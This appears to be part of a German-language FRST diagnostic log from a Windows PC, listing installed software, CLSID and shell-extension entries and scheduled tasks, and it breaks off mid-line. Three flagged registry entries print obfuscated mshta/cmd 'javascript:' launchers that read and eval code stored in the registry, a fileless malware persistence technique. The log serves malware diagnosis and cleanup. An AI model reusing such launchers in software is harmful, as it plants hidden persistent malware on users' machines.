(HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation) Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang) Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC) Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version: - Rogue Factor) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger) No Man's Sky (HKLM\...\Steam App 275850) (Version: - Hello Games) NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation) NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation) NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation) NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation) NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation) Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.) Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.) Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros) Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros) Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version: - Ubisoft) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.) Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.) Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version: - Crystal Dynamics) Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts) Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation) Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.) Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.) Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz) Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios) Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB) Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games) STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts) StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic) The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios) The Long Dark (HKLM\...\Steam App 305620) (Version: - Hinterland Studio Inc.) The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com) The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com) The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com) The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com) Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version: - Massive Entertainment) TomTom MyDrive Connect 4.1.5.3181 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.5.3181 - TomTom) Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version: - Creative Assembly) Tyranny (HKLM\...\Steam App 362960) (Version: - Obsidian Entertainment) Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft) VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.) VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com) Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.) Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes) Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment) Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version: - Fatshark) WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: - ) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version: - MachineGames) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\5b53a: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" <==== ACHTUNG HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\qofqow: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" <==== ACHTUNG HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger) ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => -> Keine Datei ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Keine Datei ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.) ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff" Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.) Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation) Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd) Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation) Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-07-11] (Microsoft Corporation) Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation) Task: {577763E4-17E6-4D07-A67F-13108AB9872D} - System32\Tasks\Uninstaller_Install_Martin_Walser => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {6277B01E-8C65-4DE6-9712-35ABEBF90E78} - System32\Tasks\StartMenu8_Start => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe [2016-11-05] () Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation) Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation) Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation) Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google 